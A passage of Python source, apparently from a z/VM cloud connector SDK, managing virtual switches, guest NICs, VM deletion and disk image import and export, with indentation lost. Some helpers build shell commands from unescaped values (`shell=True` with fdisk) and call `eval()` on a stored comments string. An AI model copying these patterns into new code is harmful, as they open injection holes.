gvrp='GVRP', queue_mem=8, native_vid=1, persist=True):
smt_userid = zvmutils.get_smt_userid()
msg = ('Start to create vswitch %s' % name)
LOG.info(msg)
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Create_Extended" %
smt_userid,
"--operands",
'-k switch_name=%s' % name))
if rdev is not None:
rd += " -k real_device_address" +\
"=\'%s\'" % rdev.replace(',', ' ')
if controller != '*':
rd += " -k controller_name=%s" % controller
rd = ' '.join((rd,
"-k connection_value=%s" % connection,
"-k queue_memory_limit=%s" % queue_mem,
"-k transport_type=%s" % network_type,
"-k vlan_id=%s" % vid,
"-k persist=%s" % (persist and 'YES' or 'NO')))
        # Only if the vswitch is vlan aware, port_type, gvrp and native_vid
        # are allowed to be specified
if isinstance(vid, int) or vid.upper() != 'UNAWARE':
rd = ' '.join((rd,
"-k port_type=%s" % port_type,
"-k gvrp_value=%s" % gvrp,
"-k native_vlanid=%s" % native_vid))
if router is not None:
rd += " -k routing_value=%s" % router
msg = ('Start to create vswitch %s' % name)
LOG.info(msg)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to create vswitch %s, error: %s" %
(name, err.format_message()))
raise
msg = ('Create vswitch %s successfully' % name)
LOG.info(msg)
def set_vswitch(self, switch_name, **kwargs):
"""Set vswitch"""
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Set_Extended" %
smt_userid,
"--operands",
"-k switch_name=%s" % switch_name))
for k, v in kwargs.items():
rd = ' '.join((rd,
"-k %(key)s=\'%(value)s\'" %
{'key': k, 'value': v}))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to set vswitch %s, error: %s" %
(switch_name, err.format_message()))
self._set_vswitch_exception(err, switch_name)
def delete_vswitch(self, switch_name, persist=True):
smt_userid = zvmutils.get_smt_userid()
msg = ('Start to delete vswitch %s' % switch_name)
LOG.info(msg)
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Delete_Extended" %
smt_userid,
"--operands",
"-k switch_name=%s" % switch_name,
"-k persist=%s" % (persist and 'YES' or 'NO')))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
if ((results['rc'] == 212) and
(results['rs'] == 40)):
LOG.warning("Vswitch %s does not exist", switch_name)
return
else:
LOG.error("Failed to delete vswitch %s, error: %s" %
(switch_name, err.format_message()))
raise
msg = ('Delete vswitch %s successfully' % switch_name)
LOG.info(msg)
def create_nic(self, userid, vdev=None, nic_id=None,
mac_addr=None, active=False):
nic_vdev = self._get_available_vdev(userid, vdev=vdev)
LOG.debug('Nic attributes: vdev is %(vdev)s, '
'ID is %(id)s, address is %(address)s',
{'vdev': nic_vdev,
'id': nic_id or 'not specified',
'address': mac_addr or 'not specified'})
self._create_nic(userid, nic_vdev, nic_id=nic_id,
mac_addr=mac_addr, active=active)
return nic_vdev
def _create_nic_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=7,
vdev=vdev, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKConflictError(modID='network', rs=7,
vdev=vdev, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 4)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _create_nic_active_exception(self, error, userid, vdev):
if (((error.results['rc'] == 204) and (error.results['rs'] == 4)) or
((error.results['rc'] == 204) and (error.results['rs'] == 28))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
elif ((error.results['rc'] == 396) and
(error.results['rs'] == 2797)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _is_active(self, userid):
# Get the vm status
power_state = self.get_power_state(userid)
if power_state == 'off':
LOG.error('The vm %s is powered off, '
'active operation is not allowed' % userid)
raise exception.SDKConflictError(modID='network', rs=1,
userid=userid)
def _create_nic(self, userid, vdev, nic_id=None, mac_addr=None,
active=False):
if active:
self._is_active(userid)
msg = ('Start to create nic device %(vdev)s for guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Adapter_Create_Extended_DM' %
userid,
"--operands",
"-k image_device_number=%s" % vdev,
"-k adapter_type=QDIO"))
if mac_addr is not None:
mac = ''.join(mac_addr.split(':'))[6:]
requestData += ' -k mac_id=%s' % mac
try:
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to create nic %s for user %s in "
"the guest's user direct, error: %s" %
(vdev, userid, err.format_message()))
self._create_nic_inactive_exception(err, userid, vdev)
if active:
if mac_addr is not None:
LOG.warning("Ignore the mac address %s when "
"adding nic on an active system" % mac_addr)
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Adapter_Create_Extended' %
userid,
"--operands",
"-k image_device_number=%s" % vdev,
"-k adapter_type=QDIO"))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err1:
msg1 = err1.format_message()
persist_OK = True
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Adapter_Delete_DM' % userid,
"--operands",
'-v %s' % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
results = err2.results
msg2 = err2.format_message()
if ((results['rc'] == 404) and
(results['rs'] == 8)):
persist_OK = True
else:
persist_OK = False
if persist_OK:
self._create_nic_active_exception(err1, userid, vdev)
else:
raise exception.SDKNetworkOperationError(rs=4,
nic=vdev, userid=userid,
create_err=msg1, revoke_err=msg2)
self._NetDbOperator.switch_add_record(userid, vdev, port=nic_id)
msg = ('Create nic device %(vdev)s for guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def get_user_direct(self, userid):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getvm %s directory" % userid)
return results.get('response', [])
def get_all_user_direct(self):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getvm alldirectory")
return results.get('response', [])
def _delete_nic_active_exception(self, error, userid, vdev):
if ((error.results['rc'] == 204) and (error.results['rs'] == 28)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=8,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _delete_nic_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=9,
vdev=vdev, userid=userid,
obj=obj_desc)
else:
raise error
def delete_nic(self, userid, vdev, active=False):
if active:
self._is_active(userid)
vdev_exist = False
nic_list = self._NetDbOperator.switch_select_record_for_userid(userid)
for p in nic_list:
if (int(p['interface'], 16) == int(vdev, 16)):
vdev_exist = True
vdev_info = p
break
if not vdev_exist:
            # Device has already been removed from the user direct
LOG.warning("Virtual device %s does not exist in the switch table",
vdev)
if active:
try:
resp = self.execute_cmd(userid, 'vmcp q %s' % vdev)
nic_info = "%s ON NIC" % vdev.zfill(4).upper()
osa_info = "%s ON OSA" % vdev.zfill(4).upper()
if nic_info in resp[0]:
pass
elif osa_info in resp[0]:
self._undedicate_nic(userid, vdev, active=active,
del_active_only=True)
return
else:
LOG.warning("Device %s of guest %s is not "
"network adapter" % (vdev, userid))
return
except exception.SDKSMTRequestFailed as err:
emsg = err.format_message()
ignored_msg = ('Device %s does not exist'
% vdev.zfill(4).upper())
if (emsg.__contains__(ignored_msg)):
LOG.warning("Virtual device %s does not exist for "
"active guest %s" % (vdev, userid))
return
else:
raise
else:
return
else:
            # Device has not been removed from the user direct,
            # check whether it is related to a dedicated OSA device
if ((vdev_info["comments"] is not None) and
(vdev_info["comments"].__contains__('OSA='))):
self._undedicate_nic(userid, vdev, active=active)
return
msg = ('Start to delete nic device %(vdev)s for guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
if vdev_exist:
rd = ' '.join((
"SMAPI %s API Virtual_Network_Adapter_Delete_DM" %
userid,
"--operands",
'-v %s' % vdev))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 404) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist in "
"the guest's user direct", vdev)
else:
LOG.error("Failed to delete nic %s for %s in "
"the guest's user direct, error: %s" %
(vdev, userid, emsg))
self._delete_nic_inactive_exception(err, userid, vdev)
self._NetDbOperator.switch_delete_record_for_nic(userid, vdev)
if active:
rd = ' '.join((
"SMAPI %s API Virtual_Network_Adapter_Delete" %
userid,
"--operands",
'-v %s' % vdev))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 204) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist on "
"the active guest system", vdev)
else:
LOG.error("Failed to delete nic %s for %s on "
"the active guest system, error: %s" %
(vdev, userid, emsg))
self._delete_nic_active_exception(err, userid, vdev)
msg = ('Delete nic device %(vdev)s for guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def _couple_active_exception(self, error, userid, vdev, vswitch):
if ((error.results['rc'] == 212) and
((error.results['rs'] == 28) or
(error.results['rs'] == 8))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=10,
vdev=vdev, userid=userid,
vsw=vswitch,
msg=errmsg)
elif ((error.results['rc'] == 212) and (error.results['rs'] == 40)):
obj_desc = "Vswitch %s" % vswitch
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 204) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 396) and
((error.results['rs'] == 2788) or
(error.results['rs'] == 2848) or
(error.results['rs'] == 3034) or
(error.results['rs'] == 6011))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=10,
vdev=vdev, userid=userid,
vsw=vswitch,
msg=errmsg)
else:
raise error
def _couple_inactive_exception(self, error, userid, vdev, vswitch):
if ((error.results['rc'] == 412) and (error.results['rs'] == 28)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=10,
vdev=vdev, userid=userid,
vsw=vswitch,
msg=errmsg)
elif ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=11,
vdev=vdev, userid=userid,
vsw=vswitch,
obj=obj_desc)
elif ((error.results['rc'] == 400) and (error.results['rs'] == 4)):
obj_desc = "Guest %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKConflictError(modID='network', rs=11,
vdev=vdev, userid=userid,
vsw=vswitch,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
else:
raise error
def _couple_nic(self, userid, vdev, vswitch_name,
active=False):
"""Couple NIC to vswitch by adding vswitch into user direct."""
if active:
self._is_active(userid)
msg = ('Start to couple nic device %(vdev)s of guest %(vm)s '
'with vswitch %(vsw)s'
% {'vdev': vdev, 'vm': userid, 'vsw': vswitch_name})
LOG.info(msg)
requestData = ' '.join((
'SMAPI %s' % userid,
"API Virtual_Network_Adapter_Connect_Vswitch_DM",
"--operands",
"-v %s" % vdev,
"-n %s" % vswitch_name))
try:
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to couple nic %s to vswitch %s for user %s "
"in the guest's user direct, error: %s" %
(vdev, vswitch_name, userid, err.format_message()))
self._couple_inactive_exception(err, userid, vdev, vswitch_name)
        # the instance must be active, or this call will fail
if active:
requestData = ' '.join((
'SMAPI %s' % userid,
'API Virtual_Network_Adapter_Connect_Vswitch',
"--operands",
"-v %s" % vdev,
"-n %s" % vswitch_name))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err1:
results1 = err1.results
msg1 = err1.format_message()
if ((results1 is not None) and
(results1['rc'] == 204) and
(results1['rs'] == 20)):
LOG.warning("Virtual device %s already connected "
"on the active guest system", vdev)
else:
persist_OK = True
requestData = ' '.join((
'SMAPI %s' % userid,
'API Virtual_Network_Adapter_Disconnect_DM',
"--operands",
'-v %s' % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
results2 = err2.results
msg2 = err2.format_message()
if ((results2 is not None) and
(results2['rc'] == 212) and
(results2['rs'] == 32)):
persist_OK = True
else:
persist_OK = False
if persist_OK:
self._couple_active_exception(err1, userid, vdev,
vswitch_name)
else:
raise exception.SDKNetworkOperationError(rs=3,
nic=vdev, vswitch=vswitch_name,
couple_err=msg1, revoke_err=msg2)
"""Update information in switch table."""
self._NetDbOperator.switch_update_record_with_switch(userid, vdev,
vswitch_name)
msg = ('Couple nic device %(vdev)s of guest %(vm)s '
'with vswitch %(vsw)s successfully'
% {'vdev': vdev, 'vm': userid, 'vsw': vswitch_name})
LOG.info(msg)
def couple_nic_to_vswitch(self, userid, nic_vdev,
vswitch_name, active=False):
"""Couple nic to vswitch."""
if active:
msg = ("both in the user direct of guest %s and on "
"the active guest system" % userid)
else:
msg = "in the user direct of guest %s" % userid
LOG.debug("Connect nic %s to switch %s %s",
nic_vdev, vswitch_name, msg)
self._couple_nic(userid, nic_vdev, vswitch_name, active=active)
def _uncouple_active_exception(self, error, userid, vdev):
if ((error.results['rc'] == 204) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 204) and (error.results['rs'] == 28)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=12,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _uncouple_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 404) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 400) and (error.results['rs'] == 4)):
obj_desc = "Guest %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=13,
vdev=vdev, userid=userid,
obj=obj_desc)
else:
raise error
def _uncouple_nic(self, userid, vdev, active=False):
"""Uncouple NIC from vswitch"""
if active:
self._is_active(userid)
msg = ('Start to uncouple nic device %(vdev)s of guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
requestData = ' '.join((
'SMAPI %s' % userid,
"API Virtual_Network_Adapter_Disconnect_DM",
"--operands",
"-v %s" % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
results = err.results
emsg = err.format_message()
if ((results is not None) and
(results['rc'] == 212) and
(results['rs'] == 32)):
LOG.warning("Virtual device %s is already disconnected "
"in the guest's user direct", vdev)
else:
LOG.error("Failed to uncouple nic %s in the guest's user "
"direct, error: %s" % (vdev, emsg))
self._uncouple_inactive_exception(err, userid, vdev)
"""Update information in switch table."""
self._NetDbOperator.switch_update_record_with_switch(userid, vdev,
None)
        # the instance must be active, or this call will fail
if active:
requestData = ' '.join((
'SMAPI %s' % userid,
'API Virtual_Network_Adapter_Disconnect',
"--operands",
"-v %s" % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
results = err.results
emsg = err.format_message()
if ((results is not None) and
(results['rc'] == 204) and
(results['rs'] == 48)):
LOG.warning("Virtual device %s is already "
"disconnected on the active "
"guest system", vdev)
else:
LOG.error("Failed to uncouple nic %s on the active "
"guest system, error: %s" % (vdev, emsg))
self._uncouple_active_exception(err, userid, vdev)
msg = ('Uncouple nic device %(vdev)s of guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def uncouple_nic_from_vswitch(self, userid, nic_vdev,
active=False):
if active:
msg = ("both in the user direct of guest %s and on "
"the active guest system" % userid)
else:
msg = "in the user direct of guest %s" % userid
LOG.debug("Disconnect nic %s with network %s",
nic_vdev, msg)
self._uncouple_nic(userid, nic_vdev, active=active)
def delete_userid(self, userid):
rd = ' '.join(('deletevm', userid, 'directory'))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
if err.results['rc'] == 400 and err.results['rs'] == 4:
# guest vm definition not found
LOG.debug("The guest %s does not exist." % userid)
return
else:
msg = "SMT error: %s" % err.format_message()
raise exception.SDKSMTRequestFailed(err.results, msg)
def delete_vm(self, userid):
self.delete_userid(userid)
# revoke userid from vswitch
action = "revoke id %s authority from vswitch" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
switch_info = self._NetDbOperator.switch_select_record_for_userid(
userid)
switch_list = set()
for item in switch_info:
switch_list.add(item['switch'])
for item in switch_list:
if item is not None:
self.revoke_user_from_vswitch(item, userid)
# cleanup db record from network table
action = "delete network record for user %s" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._NetDbOperator.switch_delete_record_for_userid(userid)
# TODO: cleanup db record from volume table
pass
# cleanup persistent folder for guest
self._pathutils.remove_guest_path(userid)
# cleanup db record from guest table
action = "delete guest %s from database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._GuestDbOperator.delete_guest_by_userid(userid)
def execute_cmd(self, userid, cmdStr):
""""cmdVM."""
requestData = 'cmdVM ' + userid + ' CMD \'' + cmdStr + '\''
with zvmutils.log_and_reraise_smt_request_failed(action='execute '
'command on vm via iucv channel'):
results = self._request(requestData)
ret = results['response']
return ret
def execute_cmd_direct(self, userid, cmdStr):
""""cmdVM."""
requestData = 'cmdVM ' + userid + ' CMD \'' + cmdStr + '\''
results = self._smt.request(requestData)
return results
def image_import(self, image_name, url, image_meta, remote_host=None):
"""Import the image specified in url to SDK image repository, and
create a record in image db, the imported images are located in
image_repository/prov_method/os_version/image_name/, for example,
/opt/sdk/images/netboot/rhel7.2/90685d2b-167bimage/0100"""
image_info = []
try:
image_info = self._ImageDbOperator.image_query_record(image_name)
except exception.SDKObjectNotExistError:
msg = ("The image record %s doens't exist in SDK image datebase,"
" will import the image and create record now" % image_name)
LOG.info(msg)
        # Ensure the specified image does not already exist in the image DB
if image_info:
msg = ("The image name %s already exists in the SDK image "
"database, please check whether it is the same image or "
"consider using a different image name for the import" % image_name)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=13, img=image_name)
try:
image_os_version = image_meta['os_version'].lower()
target_folder = self._pathutils.create_import_image_repository(
image_os_version, const.IMAGE_TYPE['DEPLOY'],
image_name)
except Exception as err:
msg = ('Failed to create repository to store image %(img)s with '
'error: %(err)s, please make sure there are enough space '
'on zvmsdk server and proper permission to create the '
'repository' % {'img': image_name,
'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKImageOperationError(rs=14, msg=msg)
if self.is_rhcos(image_os_version):
image_disk_type = image_meta.get('disk_type')
if ((image_disk_type is None) or
((image_disk_type.upper() != "DASD" and
image_disk_type.upper() != "SCSI"))):
msg = ('Disk type is required for RHCOS image import, '
'the value should be DASD or SCSI')
LOG.error(msg)
raise exception.SDKImageOperationError(rs=14, msg=msg)
else:
comments = {'disk_type': image_disk_type.upper()}
comments = str(comments)
else:
comments = None
try:
import_image_fn = urlparse.urlparse(url).path.split('/')[-1]
import_image_fpath = '/'.join([target_folder, import_image_fn])
self._scheme2backend(urlparse.urlparse(url).scheme).image_import(
image_name, url,
import_image_fpath,
remote_host=remote_host)
# Check md5 after import to ensure import a correct image
# TODO change to use query image name in DB
expect_md5sum = image_meta.get('md5sum')
real_md5sum = self._get_md5sum(import_image_fpath)
if expect_md5sum and expect_md5sum != real_md5sum:
msg = ("The md5sum after import does not match the source image,"
" the image may be corrupted")
LOG.error(msg)
raise exception.SDKImageOperationError(rs=4)
# After import to the image repository, figure out whether the image
# is a single disk image or a multiple-disk image; if it is a
# multiple-disk image, extract it; if it is a single disk image,
# rename it to match the root disk vdev
# TODO: (nafei) use sub-function to check the image type
image_type = 'rootonly'
if image_type == 'rootonly':
final_image_fpath = '/'.join([target_folder,
CONF.zvm.user_root_vdev])
os.rename(import_image_fpath, final_image_fpath)
elif image_type == 'alldisks':
# For multiple disks image, extract it, after extract, the
# content under image folder is like: 0100, 0101, 0102
# and remove the image file 0100-0101-0102.tgz
pass
# TODO: put multiple disk image into consideration, update the
# disk_size_units and image_size db field
if not self.is_rhcos(image_os_version):
disk_size_units = self._get_disk_size_units(final_image_fpath)
else:
disk_size_units = self._get_disk_size_units_rhcos(
final_image_fpath)
image_size = self._get_image_size(final_image_fpath)
# TODO: update the real_md5sum field to include each disk image
self._ImageDbOperator.image_add_record(image_name,
image_os_version,
real_md5sum,
disk_size_units,
image_size,
image_type,
comments=comments)
LOG.info("Image %s imported successfully" % image_name)
except Exception:
# Cleanup the image from image repository
self._pathutils.clean_temp_folder(target_folder)
raise
def image_export(self, image_name, dest_url, remote_host=None):
"""Export the specified image to a remote host or the local file system
:param image_name: image name that uniquely identifies an image
:param dest_url: the location to store the exported image, eg.
/opt/images, the image will be stored in the folder
/opt/images/
:param remote_host: the server to export the image to, in the format
username@IP eg. nova@192.168.99.1; if remote_host is
None, the image will be stored on the local server
:returns: a dictionary that contains the exported image info
{
'image_name': the image_name that exported
'image_path': the image_path after exported
'os_version': the os version of the exported image
'md5sum': the md5sum of the original image
'comments': the comments of the original image
}
"""
image_info = self._ImageDbOperator.image_query_record(image_name)
if not image_info:
msg = ("The image %s does not exist in image repository"
% image_name)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=20, img=image_name)
image_type = image_info[0]['type']
# TODO: (nafei) according to image_type, detect image exported path
# For multiple disk image, make the tgz firstly, the specify the
# source_path to be something like: 0100-0101-0102.tgz
if image_type == 'rootonly':
source_path = '/'.join([CONF.image.sdk_image_repository,
const.IMAGE_TYPE['DEPLOY'],
image_info[0]['imageosdistro'],
image_name,
CONF.zvm.user_root_vdev])
else:
pass
self._scheme2backend(urlparse.urlparse(dest_url).scheme).image_export(
source_path, dest_url,
remote_host=remote_host)
# TODO: (nafei) for multiple disks image, update the expect_dict
# to be the tgz's md5sum
export_dict = {'image_name': image_name,
'image_path': dest_url,
'os_version': image_info[0]['imageosdistro'],
'md5sum': image_info[0]['md5sum'],
'comments': image_info[0]['comments']}
LOG.info("Image %s exported successfully" % image_name)
return export_dict
def _get_image_disk_size_units(self, image_path):
""" Return a comma separated string to indicate the image disk size
and units for each image disk file under image_path
For single disk image , it looks like: 0100=3338:CYL
For multiple disk image, it looks like:
0100=3338:CYL,0101=4194200:BLK, 0102=4370:CYL"""
pass
def _get_disk_size_units(self, image_path):
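"""Parse the image header captured by the SDK (via hexdump) and return the root disk size and units as '<size>:<CYL|BLK>', e.g. '3338:CYL'."""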
command = 'hexdump -n 48 -C %s' % image_path
(rc, output) = zvmutils.execute(command)
LOG.debug("hexdump result is %s" % output)
if rc:
msg = ("Error happened when executing command hexdump with "
"reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=5)
try:
root_disk_size = int(output[144:156])
disk_units = output[220:223]
root_disk_units = ':'.join([str(root_disk_size), disk_units])
except ValueError:
msg = ("Image file at %s is missing built-in disk size "
"metadata, it was probably not captured by SDK" %
image_path)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=6)
if 'FBA' not in output and 'CKD' not in output:
raise exception.SDKImageOperationError(rs=7)
LOG.debug("The image's root_disk_units is %s" % root_disk_units)
return root_disk_units
def _get_disk_size_units_rhcos(self, image_path):
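"""Derive the root disk size in cylinders for an RHCOS image from its byte size reported by fdisk, returned as '<cylinders>:CYL'."""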
command = "fdisk -b 4096 -l %s | head -2 | awk '{print $5}'" % (
image_path)
rc = 0
output = ""
try:
# shell should be set True because it is a shell command with
# pipeline, so can not use utils.execute function here
output = subprocess.check_output(command, shell=True,
stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
rc = err.returncode
output = err.output
except Exception as err:
err_msg = ('Command "%s" Error: %s' % (command, str(err)))
raise exception.SDKInternalError(msg=err_msg)
if rc or output.strip('1234567890\n'):
msg = ("Error happened when executing command fdisk with "
"reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=8)
image_size = output.split()[0]
try:
cyl = (float(image_size)) / 737280
cyl = str(int(math.ceil(cyl)))
except Exception:
msg = ("Failed to convert %s to a number of cylinders."
% image_size)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=14, msg=msg)
disk_units = "CYL"
root_disk_units = ':'.join([str(cyl), disk_units])
LOG.debug("The image's root_disk_units is %s" % root_disk_units)
return root_disk_units
def _get_image_size(self, image_path):
"""Return disk size in bytes"""
command = 'du -b %s' % image_path
(rc, output) = zvmutils.execute(command)
if rc:
msg = ("Error happened when executing command du -b with "
"reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=8)
size = output.split()[0]
return size
def _get_image_path_by_name(self, image_name):
try:
target_info = self._ImageDbOperator.image_query_record(image_name)
except exception.SDKObjectNotExistError:
msg = ("The image %s does not exist in image repository"
% image_name)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=20, img=image_name)
# TODO: (nafei) Handle multiple disks image deploy
image_path = '/'.join([CONF.image.sdk_image_repository,
const.IMAGE_TYPE['DEPLOY'],
target_info[0]['imageosdistro'],
image_name])
return image_path
def _scheme2backend(self, scheme):
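"""Map a URL scheme ('file' or 'http') to the backend class used for image import/export."""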
try:
return {
"file": FilesystemBackend,
"http": HTTPBackend,
# "https": HTTPSBackend
}[scheme]
except KeyError:
msg = ("No backend found for '%s'" % scheme)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=2, schema=scheme)
def _get_md5sum(self, fpath):
"""Calculate the md5sum of the specific image file"""
try:
current_md5 = hashlib.md5()
if isinstance(fpath, six.string_types) and os.path.exists(fpath):
with open(fpath, "rb") as fh:
for chunk in self._read_chunks(fh):
current_md5.update(chunk)
elif (fpath.__class__.__name__ in ["StringIO", "StringO"] or
isinstance(fpath, IOBase)):
for chunk in self._read_chunks(fpath):
current_md5.update(chunk)
else:
return ""
return current_md5.hexdigest()
except Exception:
msg = ("Failed to calculate the image's md5sum")
LOG.error(msg)
raise exception.SDKImageOperationError(rs=3)
def _read_chunks(self, fh):
fh.seek(0)
chunk = fh.read(CHUNKSIZE)
while chunk:
yield chunk
chunk = fh.read(CHUNKSIZE)
else:
fh.seek(0)
def image_delete(self, image_name):
# Delete image file
try:
self._delete_image_file(image_name)
# Delete image record from db
self._ImageDbOperator.image_delete_record(image_name)
except exception.SDKImageOperationError as err:
results = err.results
if ((results['rc'] == 300) and (results['rs'] == 20)):
LOG.warning("Image %s does not exist", image_name)
return
else:
LOG.error("Failed to delete image %s, error: %s" %
(image_name, err.format_message()))
raise
msg = ('Delete image %s successfully' % image_name)
LOG.info(msg)
def _delete_image_file(self, image_name):
image_path = self._get_image_path_by_name(image_name)
self._pathutils.clean_temp_folder(image_path)
def _get_image_last_access_time(self, image_name, raise_exception=True):
"""Get the last access time of the image."""
image_file = os.path.join(self._get_image_path_by_name(image_name),
CONF.zvm.user_root_vdev)
if not os.path.exists(image_file):
if raise_exception:
msg = 'Failed to get time stamp of image:%s' % image_name
LOG.error(msg)
raise exception.SDKImageOperationError(rs=23, img=image_name)
else:
# An invalid timestamp
return -1
atime = os.path.getatime(image_file)
return atime
def image_query(self, image_name=None):
image_info = self._ImageDbOperator.image_query_record(image_name)
if not image_info:
# the query may return nothing if no record exists, so return an empty list here
return []
# if image_name is not None, means there is only one record
if image_name:
last_access_time = self._get_image_last_access_time(
image_name, raise_exception=False)
image_info[0]['last_access_time'] = last_access_time
else:
for item in image_info:
image_name = item['imagename']
# set raise_exception to False so that one failed item does not
# stop processing the rest of the list
last_access_time = self._get_image_last_access_time(
image_name, raise_exception=False)
item['last_access_time'] = last_access_time
return image_info
def image_get_root_disk_size(self, image_name):
"""Return the root disk units of the specified image
image_name: the unique image name in db
Return the disk units in format like 3339:CYL or 467200:BLK
"""
image_info = self.image_query(image_name)
if not image_info:
raise exception.SDKImageOperationError(rs=20, img=image_name)
disk_size_units = image_info[0]['disk_size_units'].split(':')[0]
return disk_size_units
def image_get_os_distro(self, image_name):
"""
Return the operating system distro of the specified image
"""
image_info = self._ImageDbOperator.image_query_record(image_name)
if not image_info:
raise exception.SDKImageOperationError(rs=20, img=image_name)
os_distro = image_info[0]['imageosdistro']
return os_distro
def _get_image_disk_type(self, image_name):
"""
Return image disk type
"""
image_info = self._ImageDbOperator.image_query_record(image_name)
if ((image_info[0]['comments'] is not None) and
(image_info[0]['comments'].__contains__('disk_type'))):
image_disk_type = eval(image_info[0]['comments'])['disk_type']
if image_disk_type == 'DASD':
return 'ECKD'
elif image_disk_type == 'SCSI':
return 'SCSI'
else:
return None
else:
return None
def punch_file(self, userid, fn, fclass):
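"""Punch the local file to the guest's reader with the given spool class via 'changevm punchfile'; the local file is removed afterwards."""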
rd = ("changevm %(uid)s punchfile %(file)s --class %(class)s" %
{'uid': userid, 'file': fn, 'class': fclass})
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
